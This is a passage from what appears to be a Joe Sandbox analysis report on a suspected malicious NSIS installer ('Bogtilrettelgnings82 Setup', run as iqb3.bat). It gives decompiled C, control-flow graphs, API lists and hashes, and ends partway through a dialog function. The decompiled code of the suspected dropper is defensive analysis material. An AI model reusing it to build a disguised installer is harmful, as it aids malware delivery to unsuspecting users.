4837->4805 4838->4806 5586 40163f 5587 4029fd 18 API calls 5586->5587 5588 401645 5587->5588 5589 405fe2 2 API calls 5588->5589 5590 40164b 5589->5590 5591 40193f 5592 4029e0 18 API calls 5591->5592 5593 401946 5592->5593 5594 4029e0 18 API calls 5593->5594 5595 401950 5594->5595 5596 4029fd 18 API calls 5595->5596 5597 401959 5596->5597 5598 40196c lstrlenA 5597->5598 5599 4019a7 5597->5599 5600 401976 5598->5600 5600->5599 5604 405cde lstrcpynA 5600->5604 5602 401990 5602->5599 5603 40199d lstrlenA 5602->5603 5603->5599 5604->5602

                                                                      Executed Functions

                                                                      Function 00403217 Relevance: 79.1, APIs: 27, Strings: 18, Instructions: 324stringfilecomCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 403217-4032ae #17 SetErrorMode OleInitialize call 406009 SHGetFileInfoA call 405cde GetCommandLineA call 405cde GetModuleHandleA 7 4032b0-4032b5 0->7 8 4032ba-4032cf call 405799 CharNextA 0->8 7->8 11 403394-403398 8->11 12 4032d4-4032d7 11->12 13 40339e 11->13 14 4032d9-4032dd 12->14 15 4032df-4032e7 12->15 16 4033b1-4033cb GetTempPathA call 4031e3 13->16 14->14 14->15 18 4032e9-4032ea 15->18 19 4032ef-4032f2 15->19 25 403423-40343d DeleteFileA call 402c79 16->25 26 4033cd-4033eb GetWindowsDirectoryA lstrcatA call 4031e3 16->26 18->19 20 403384-403391 call 405799 19->20 21 4032f8-4032fc 19->21 20->11 40 403393 20->40 23 403314-403341 21->23 24 4032fe-403304 21->24 30 403343-403349 23->30 31 403354-403382 23->31 28 403306-403308 24->28 29 40330a 24->29 43 4034d1-4034e0 call 403675 OleUninitialize 25->43 44 403443-403449 25->44 26->25 42 4033ed-40341d GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031e3 26->42 28->23 28->29 29->23 35 40334b-40334d 30->35 36 40334f 30->36 31->20 38 4033a0-4033ac call 405cde 31->38 35->31 35->36 36->31 38->16 40->11 42->25 42->43 54 4034e6-4034f6 call 4054f2 ExitProcess 43->54 55 4035da-4035e0 43->55 47 4034c1-4034c8 call 403767 44->47 48 40344b-403456 call 405799 44->48 56 4034cd 47->56 57 403458-403481 48->57 58 40348c-403496 48->58 60 4035e2-4035ff call 406009 * 3 55->60 61 40365d-403665 55->61 56->43 62 403483-403485 57->62 65 403498-4034a5 call 40585c 58->65 66 4034fc-403516 lstrcatA lstrcmpiA 58->66 87 403601-403603 60->87 88 403649-403654 ExitWindowsEx 60->88 63 403667 61->63 64 40366b-40366f ExitProcess 61->64 62->58 70 403487-40348a 62->70 63->64 65->43 78 4034a7-4034bd call 405cde * 2 65->78 66->43 72 403518-40352d CreateDirectoryA SetCurrentDirectoryA 66->72 70->58 70->62 75 40353a-403562 call 405cde 72->75 76 40352f-403535 call 405cde 72->76 86 403568-403584 call 405d00 DeleteFileA 75->86 76->75 78->47 96 4035c5-4035cc 86->96 97 403586-403596 CopyFileA 86->97 87->88 91 403605-403607 87->91 88->61 93 403656-403658 call 40140b 88->93 91->88 98 403609-40361b GetCurrentProcess 91->98 93->61 96->86 100 4035ce-4035d5 call 405b92 96->100 97->96 99 403598-4035b8 call 405b92 call 405d00 call 405491 97->99 98->88 105 40361d-40363f 98->105 99->96 112 4035ba-4035c1 CloseHandle 99->112 100->43 105->88 112->96
                                                                      C-Code - Quality: 87%
                                                                      			_entry_() {
				int _t38;
				CHAR* _t43;
				char* _t46;
				CHAR* _t48;
				void* _t52;
				intOrPtr _t54;
				int _t56;
				int _t59;
				int _t60;
				int _t64;
				void* _t86;
				signed int _t100;
				void* _t103;
				void* _t108;
				char _t110;
				int _t129;
				int _t130;
				CHAR* _t137;
				int _t138;
				int _t140;
				intOrPtr* _t143;
				char* _t146;
				int _t147;
				void* _t148;
				void* _t149;
				char _t166;

				 *(_t149 + 0x18) = 0;
				 *((intOrPtr*)(_t149 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t149 + 0x20) = 0;
				 *((char*)(_t149 + 0x14)) = 0x20;
				__imp__#17();
				_t38 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423798 = _t38;
				 *0x4236e4 = E00406009(8);
				SHGetFileInfoA(0x41eca0, 0, _t149 + 0x38, 0x160, 0); // executed
				E00405CDE("Bogtilrettelgnings82 Setup", "NSIS Error");
				_t43 = GetCommandLineA();
				_t146 = "\"C:\\Users\\Public\\iqb3.bat\" ";
				E00405CDE(_t146, _t43);
				 *0x4236e0 = GetModuleHandleA(0);
				_t46 = _t146;
				if("\"C:\\Users\\Public\\iqb3.bat\" " == 0x22) {
					 *((char*)(_t149 + 0x14)) = 0x22;
					_t46 =  &M00429001;
				}
				_t48 = CharNextA(E00405799(_t46,  *((intOrPtr*)(_t149 + 0x14))));
				 *(_t149 + 0x1c) = _t48;
				while(1) {
					_t110 =  *_t48;
					_t151 = _t110;
					if(_t110 == 0) {
						break;
					}
					__eflags = _t110 - 0x20;
					if(_t110 != 0x20) {
						L5:
						__eflags =  *_t48 - 0x22;
						 *((char*)(_t149 + 0x14)) = 0x20;
						if( *_t48 == 0x22) {
							_t48 =  &(_t48[1]);
							__eflags = _t48;
							 *((char*)(_t149 + 0x14)) = 0x22;
						}
						__eflags =  *_t48 - 0x2f;
						if( *_t48 != 0x2f) {
							L17:
							_t48 = E00405799(_t48,  *((intOrPtr*)(_t149 + 0x14)));
							__eflags =  *_t48 - 0x22;
							if(__eflags == 0) {
								_t48 =  &(_t48[1]);
								__eflags = _t48;
							}
							continue;
						}
						_t48 =  &(_t48[1]);
						__eflags =  *_t48 - 0x53;
						if( *_t48 != 0x53) {
							L12:
							__eflags =  *_t48 - ((( *0x4091df << 0x00000008 |  *0x4091de) << 0x00000008 |  *0x4091dd) << 0x00000008 | "NCRC");
							if( *_t48 != ((( *0x4091df << 0x00000008 |  *0x4091de) << 0x00000008 |  *0x4091dd) << 0x00000008 | "NCRC")) {
								L16:
								__eflags =  *((intOrPtr*)(_t48 - 2)) - ((( *0x4091d7 << 0x00000008 |  *0x4091d6) << 0x00000008 |  *0x4091d5) << 0x00000008 | " /D=");
								if( *((intOrPtr*)(_t48 - 2)) == ((( *0x4091d7 << 0x00000008 |  *0x4091d6) << 0x00000008 |  *0x4091d5) << 0x00000008 | " /D=")) {
									 *((char*)(_t48 - 2)) = 0;
									__eflags =  &(_t48[2]);
									E00405CDE("C:\\Users\\engineer\\Vkstcentrene\\unprotuberant",  &(_t48[2]));
									break;
								}
								goto L17;
							}
							_t129 = _t48[4];
							__eflags = _t129 - 0x20;
							if(_t129 == 0x20) {
								L15:
								_t13 = _t149 + 0x20;
								 *_t13 =  *(_t149 + 0x20) | 0x00000004;
								__eflags =  *_t13;
								goto L16;
							}
							__eflags = _t129;
							if(_t129 != 0) {
								goto L16;
							}
							goto L15;
						}
						_t130 = _t48[1];
						__eflags = _t130 - 0x20;
						if(_t130 == 0x20) {
							L11:
							 *0x423780 = 1;
							goto L12;
						}
						__eflags = _t130;
						if(_t130 != 0) {
							goto L12;
						}
						goto L11;
					} else {
						goto L4;
					}
					do {
						L4:
						_t48 =  &(_t48[1]);
						__eflags =  *_t48 - 0x20;
					} while ( *_t48 == 0x20);
					goto L5;
				}
				_t137 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
				GetTempPathA(0x400, _t137);
				_t52 = E004031E3(_t151);
				_t152 = _t52;
				if(_t52 != 0) {
					L25:
					DeleteFileA("1033"); // executed
					_t54 = E00402C79(_t154,  *(_t149 + 0x20)); // executed
					 *((intOrPtr*)(_t149 + 0x10)) = _t54;
					if(_t54 != 0) {
						L35:
						E00403675();
						__imp__OleUninitialize();
						if( *((intOrPtr*)(_t149 + 0x10)) == 0) {
							__eflags =  *0x423774;
							if( *0x423774 != 0) {
								_t147 = E00406009(3);
								_t140 = E00406009(4);
								_t59 = E00406009(5);
								__eflags = _t147;
								_t138 = _t59;
								if(_t147 != 0) {
									__eflags = _t140;
									if(_t140 != 0) {
										__eflags = _t138;
										if(_t138 != 0) {
											_t64 =  *_t147(GetCurrentProcess(), 0x28, _t149 + 0x1c);
											__eflags = _t64;
											if(_t64 != 0) {
												 *_t140(0, "SeShutdownPrivilege", _t149 + 0x28);
												 *(_t149 + 0x3c) = 1;
												 *(_t149 + 0x48) = 2;
												 *_t138( *((intOrPtr*)(_t149 + 0x30)), 0, _t149 + 0x2c, 0, 0, 0);
											}
										}
									}
								}
								_t60 = ExitWindowsEx(2, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									E0040140B(9);
								}
							}
							_t56 =  *0x42378c;
							__eflags = _t56 - 0xffffffff;
							if(_t56 != 0xffffffff) {
								 *(_t149 + 0x18) = _t56;
							}
							ExitProcess( *(_t149 + 0x18));
						}
						E004054F2( *((intOrPtr*)(_t149 + 0x14)), 0x200010);
						ExitProcess(2);
					}
					if( *0x4236fc == 0) {
						L34:
						 *0x42378c =  *0x42378c | 0xffffffff;
						 *(_t149 + 0x18) = E00403767();
						goto L35;
					}
					_t143 = E00405799(_t146, 0);
					if(_t143 < _t146) {
						L31:
						_t161 = _t143 - _t146;
						 *((intOrPtr*)(_t149 + 0x10)) = "Error launching installer";
						if(_t143 < _t146) {
							lstrcatA(_t137, "~nsu.tmp");
							if(lstrcmpiA(_t137, "C:\\Users\\Public") == 0) {
								goto L35;
							}
							CreateDirectoryA(_t137, 0);
							SetCurrentDirectoryA(_t137);
							_t166 = "C:\\Users\\engineer\\Vkstcentrene\\unprotuberant"; // 0x43
							if(_t166 == 0) {
								E00405CDE("C:\\Users\\engineer\\Vkstcentrene\\unprotuberant", "C:\\Users\\Public");
							}
							E00405CDE(0x424000,  *(_t149 + 0x1c));
							_t148 = 0x1a;
							 *0x424400 = "A";
							do {
								E00405D00(0, _t137, 0x41e8a0, 0x41e8a0,  *((intOrPtr*)( *0x4236f0 + 0x120)));
								DeleteFileA(0x41e8a0);
								if( *((intOrPtr*)(_t149 + 0x10)) != 0 && CopyFileA("C:\\Users\\Public\\iqb3.bat", 0x41e8a0, 1) != 0) {
									E00405B92(0x41e8a0, 0);
									E00405D00(0, _t137, 0x41e8a0, 0x41e8a0,  *((intOrPtr*)( *0x4236f0 + 0x124)));
									_t86 = E00405491(0x41e8a0);
									if(_t86 != 0) {
										CloseHandle(_t86);
										 *((intOrPtr*)(_t149 + 0x10)) = 0;
									}
								}
								 *0x424400 =  *0x424400 + 1;
								_t148 = _t148 - 1;
							} while (_t148 != 0);
							E00405B92(_t137, 0);
							goto L35;
						}
						 *_t143 = 0;
						_t144 = _t143 + 4;
						if(E0040585C(_t161, _t143 + 4) == 0) {
							goto L35;
						}
						E00405CDE("C:\\Users\\engineer\\Vkstcentrene\\unprotuberant", _t144);
						E00405CDE("C:\\Users\\engineer\\Vkstcentrene\\unprotuberant\\Benediktinerklostrets\\Rehandles\\Abortionist\\Korses", _t144);
						 *((intOrPtr*)(_t149 + 0x10)) = 0;
						goto L34;
					}
					_t100 = (( *0x4091b7 << 0x00000008 |  *0x4091b6) << 0x00000008 |  *0x4091b5) << 0x00000008 | " _?=";
					while( *_t143 != _t100) {
						_t143 = _t143 - 1;
						if(_t143 >= _t146) {
							continue;
						}
						goto L31;
					}
					goto L31;
				}
				GetWindowsDirectoryA(_t137, 0x3fb);
				lstrcatA(_t137, "\\Temp");
				_t103 = E004031E3(_t152);
				_t153 = _t103;
				if(_t103 != 0) {
					goto L25;
				}
				GetTempPathA(0x3fc, _t137);
				lstrcatA(_t137, "Low");
				SetEnvironmentVariableA("TEMP", _t137);
				SetEnvironmentVariableA("TMP", _t137);
				_t108 = E004031E3(_t153);
				_t154 = _t108;
				if(_t108 == 0) {
					goto L35;
				}
				goto L25;
			}





























                                                                      0x00403223
                                                                      0x00403227
                                                                      0x0040322f
                                                                      0x00403233
                                                                      0x00403238
                                                                      0x00403243
                                                                      0x0040324a
                                                                      0x00403252
                                                                      0x0040325c
                                                                      0x00403272
                                                                      0x00403282
                                                                      0x00403287
                                                                      0x0040328d
                                                                      0x00403294
                                                                      0x004032a7
                                                                      0x004032ac
                                                                      0x004032ae
                                                                      0x004032b0
                                                                      0x004032b5
                                                                      0x004032b5
                                                                      0x004032c5
                                                                      0x004032cb
                                                                      0x00403394
                                                                      0x00403394
                                                                      0x00403396
                                                                      0x00403398
                                                                      0x0040339e
                                                                      0x0040339e
                                                                      0x004032d4
                                                                      0x004032d7
                                                                      0x004032df
                                                                      0x004032df
                                                                      0x004032e2
                                                                      0x004032e7
                                                                      0x004032e9
                                                                      0x004032e9
                                                                      0x004032ea
                                                                      0x004032ea
                                                                      0x004032ef
                                                                      0x004032f2
                                                                      0x00403384
                                                                      0x00403389
                                                                      0x0040338e
                                                                      0x00403391
                                                                      0x00403393
                                                                      0x00403393
                                                                      0x00403393
                                                                      0x00000000
                                                                      0x00403391
                                                                      0x004032f8
                                                                      0x004032f9
                                                                      0x004032fc
                                                                      0x00403314
                                                                      0x0040333f
                                                                      0x00403341
                                                                      0x00403354
                                                                      0x0040337f
                                                                      0x00403382
                                                                      0x004033a0
                                                                      0x004033a3
                                                                      0x004033ac
                                                                      0x00000000
                                                                      0x004033ac
                                                                      0x00000000
                                                                      0x00403382
                                                                      0x00403343
                                                                      0x00403346
                                                                      0x00403349
                                                                      0x0040334f
                                                                      0x0040334f
                                                                      0x0040334f
                                                                      0x0040334f
                                                                      0x00000000
                                                                      0x0040334f
                                                                      0x0040334b
                                                                      0x0040334d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040334d
                                                                      0x004032fe
                                                                      0x00403301
                                                                      0x00403304
                                                                      0x0040330a
                                                                      0x0040330a
                                                                      0x00000000
                                                                      0x0040330a
                                                                      0x00403306
                                                                      0x00403308
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004032d9
                                                                      0x004032d9
                                                                      0x004032d9
                                                                      0x004032da
                                                                      0x004032da
                                                                      0x00000000
                                                                      0x004032d9
                                                                      0x004033b7
                                                                      0x004033c2
                                                                      0x004033c4
                                                                      0x004033c9
                                                                      0x004033cb
                                                                      0x00403423
                                                                      0x00403428
                                                                      0x00403432
                                                                      0x00403439
                                                                      0x0040343d
                                                                      0x004034d1
                                                                      0x004034d1
                                                                      0x004034d6
                                                                      0x004034e0
                                                                      0x004035da
                                                                      0x004035e0
                                                                      0x004035eb
                                                                      0x004035f4
                                                                      0x004035f6
                                                                      0x004035fb
                                                                      0x004035fd
                                                                      0x004035ff
                                                                      0x00403601
                                                                      0x00403603
                                                                      0x00403605
                                                                      0x00403607
                                                                      0x00403617
                                                                      0x00403619
                                                                      0x0040361b
                                                                      0x00403628
                                                                      0x00403637
                                                                      0x0040363f
                                                                      0x00403647
                                                                      0x00403647
                                                                      0x0040361b
                                                                      0x00403607
                                                                      0x00403603
                                                                      0x0040364c
                                                                      0x00403652
                                                                      0x00403654
                                                                      0x00403658
                                                                      0x00403658
                                                                      0x00403654
                                                                      0x0040365d
                                                                      0x00403662
                                                                      0x00403665
                                                                      0x00403667
                                                                      0x00403667
                                                                      0x0040366f
                                                                      0x0040366f
                                                                      0x004034ef
                                                                      0x004034f6
                                                                      0x004034f6
                                                                      0x00403449
                                                                      0x004034c1
                                                                      0x004034c1
                                                                      0x004034cd
                                                                      0x00000000
                                                                      0x004034cd
                                                                      0x00403452
                                                                      0x00403456
                                                                      0x0040348c
                                                                      0x0040348c
                                                                      0x0040348e
                                                                      0x00403496
                                                                      0x00403502
                                                                      0x00403516
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040351a
                                                                      0x00403521
                                                                      0x00403527
                                                                      0x0040352d
                                                                      0x00403535
                                                                      0x00403535
                                                                      0x00403543
                                                                      0x0040355a
                                                                      0x00403562
                                                                      0x00403568
                                                                      0x00403574
                                                                      0x0040357a
                                                                      0x00403584
                                                                      0x0040359a
                                                                      0x004035ab
                                                                      0x004035b1
                                                                      0x004035b8
                                                                      0x004035bb
                                                                      0x004035c1
                                                                      0x004035c1
                                                                      0x004035b8
                                                                      0x004035c5
                                                                      0x004035cb
                                                                      0x004035cb
                                                                      0x004035d0
                                                                      0x00000000
                                                                      0x004035d0
                                                                      0x00403498
                                                                      0x0040349a
                                                                      0x004034a5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004034ad
                                                                      0x004034b8
                                                                      0x004034bd
                                                                      0x00000000
                                                                      0x004034bd
                                                                      0x00403481
                                                                      0x00403483
                                                                      0x00403487
                                                                      0x0040348a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040348a
                                                                      0x00000000
                                                                      0x00403483
                                                                      0x004033d3
                                                                      0x004033df
                                                                      0x004033e4
                                                                      0x004033e9
                                                                      0x004033eb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004033f3
                                                                      0x004033fb
                                                                      0x0040340c
                                                                      0x00403414
                                                                      0x00403416
                                                                      0x0040341b
                                                                      0x0040341d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      APIs
                                                                      • #17.COMCTL32 ref: 00403238
                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 00403243
                                                                      • OleInitialize.OLE32(00000000), ref: 0040324A
                                                                        • Part of subcall function 00406009: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000008), ref: 0040601B
                                                                        • Part of subcall function 00406009: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000008), ref: 00406026
                                                                        • Part of subcall function 00406009: GetProcAddress.KERNEL32(00000000,?), ref: 00406037
                                                                      • SHGetFileInfoA.SHELL32(0041ECA0,00000000,?,00000160,00000000,00000008), ref: 00403272
                                                                        • Part of subcall function 00405CDE: lstrcpynA.KERNEL32(?,?,00000400,00403287,Bogtilrettelgnings82 Setup,NSIS Error), ref: 00405CEB
                                                                      • GetCommandLineA.KERNEL32(Bogtilrettelgnings82 Setup,NSIS Error), ref: 00403287
                                                                      • GetModuleHandleA.KERNEL32(00000000,"C:\Users\Public\iqb3.bat" ,00000000), ref: 0040329A
                                                                      • CharNextA.USER32(00000000,"C:\Users\Public\iqb3.bat" ,00000020), ref: 004032C5
                                                                      • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033C2
                                                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033D3
                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033DF
                                                                      • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F3
                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033FB
                                                                      • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040340C
                                                                      • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403414
                                                                      • DeleteFileA.KERNELBASE(1033), ref: 00403428
                                                                      • OleUninitialize.OLE32(?), ref: 004034D6
                                                                      • ExitProcess.KERNEL32 ref: 004034F6
                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\Public\iqb3.bat" ,00000000,?), ref: 00403502
                                                                      • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\Public,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\Public\iqb3.bat" ,00000000,?), ref: 0040350E
                                                                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040351A
                                                                      • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403521
                                                                      • DeleteFileA.KERNEL32(0041E8A0,0041E8A0,?,00424000,?), ref: 0040357A
                                                                      • CopyFileA.KERNEL32(C:\Users\Public\iqb3.bat,0041E8A0,00000001), ref: 0040358E
                                                                      • CloseHandle.KERNEL32(00000000,0041E8A0,0041E8A0,?,0041E8A0,00000000), ref: 004035BB
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403610
                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 0040364C
                                                                      • ExitProcess.KERNEL32 ref: 0040366F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                      • String ID: "$"C:\Users\Public\iqb3.bat" $1033$Bogtilrettelgnings82 Setup$C:\Users\Public$C:\Users\Public\iqb3.bat$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Vkstcentrene\unprotuberant$C:\Users\user\Vkstcentrene\unprotuberant\Benediktinerklostrets\Rehandles\Abortionist\Korses$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                      • API String ID: 4107622049-3886040151
                                                                      • Opcode ID: 9d4426ba838105f0d7d34f101a5e3210ade380a600151a39266de6a9d1435484
                                                                      • Instruction ID: 10d5b1ce5ea8024dda8b9430cf8fc6ad938cae2f300cbf654cf654b9e6cc86b6
                                                                      • Opcode Fuzzy Hash: 9d4426ba838105f0d7d34f101a5e3210ade380a600151a39266de6a9d1435484
                                                                      • Instruction Fuzzy Hash: 70B107706083517AE721AF619D89A2B7EACEB41706F04447FF541BA2D2C77C9E01CB6E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405107 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 280windowclipboardmemoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 113 405107-405123 114 4052b4-4052ba 113->114 115 405129-4051f2 GetDlgItem * 3 call 404001 call 404867 GetClientRect GetSystemMetrics SendMessageA * 2 113->115 117 4052e4-4052f0 114->117 118 4052bc-4052de GetDlgItem CreateThread FindCloseChangeNotification 114->118 137 405210-405213 115->137 138 4051f4-40520e SendMessageA * 2 115->138 120 405312-405318 117->120 121 4052f2-4052f8 117->121 118->117 125 40531a-405320 120->125 126 40536d-405370 120->126 123 405333-40533a call 404033 121->123 124 4052fa-40530d ShowWindow * 2 call 404001 121->124 134 40533f-405343 123->134 124->120 131 405322-40532e call 403fa5 125->131 132 405346-405356 ShowWindow 125->132 126->123 129 405372-405378 126->129 129->123 139 40537a-40538d SendMessageA 129->139 131->123 135 405366-405368 call 403fa5 132->135 136 405358-405361 call 404fc9 132->136 135->126 136->135 142 405223-40523a call 403fcc 137->142 143 405215-405221 SendMessageA 137->143 138->137 144 405393-4053bf CreatePopupMenu call 405d00 AppendMenuA 139->144 145 40548a-40548c 139->145 150 405270-405291 GetDlgItem SendMessageA 142->150 151 40523c-405250 ShowWindow 142->151 143->142 152 4053c1-4053d1 GetWindowRect 144->152 153 4053d4-4053ea TrackPopupMenu 144->153 145->134 150->145 157 405297-4052af SendMessageA * 2 150->157 154 405252-40525d ShowWindow 151->154 155 40525f 151->155 152->153 153->145 156 4053f0-40540a 153->156 158 405265-40526b call 404001 154->158 155->158 159 40540f-40542a SendMessageA 156->159 157->145 158->150 159->159 160 40542c-40544c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 159->160 162 40544e-40546e SendMessageA 160->162 162->162 163 405470-405484 GlobalUnlock SetClipboardData CloseClipboard 162->163 163->145
                                                                      C-Code - Quality: 96%
                                                                      			E00405107(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t113;
				void* _t121;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;

				_t87 =  *0x422ec4; // 0x1047c
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						_t121 = CreateThread(0, 0, E0040509B, GetDlgItem(_a4, 0x3ec), 0,  &_a8); // executed
						FindCloseChangeNotification(_t121);
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E00405D00(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x41fce0;
								_v40 = 0xfff;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x422eac - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x4236e8, 8);
							__eflags =  *0x42376c - _t150;
							if( *0x42376c == _t150) {
								_t113 =  *0x41f4b8; // 0x56f0e4
								E00404FC9( *((intOrPtr*)(_t113 + 0x34)), _t150);
							}
							E00403FA5(1);
							goto L25;
						}
						 *0x41f0b0 = 2;
						E00403FA5(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404033(_t157, _a12, _a16);
						}
						ShowWindow( *0x422eb0, _t150);
						ShowWindow(_v8, 8);
						E00404001(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_v56 = 2;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x4236f0;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x422eb0 = GetDlgItem(_a4, 0x403);
				 *0x422ea8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x422ec4 = _t128;
				_v8 = _t128;
				E00404001( *0x422eb0);
				 *0x422eb4 = E00404867(4);
				 *0x422ecc = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v56); // executed
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
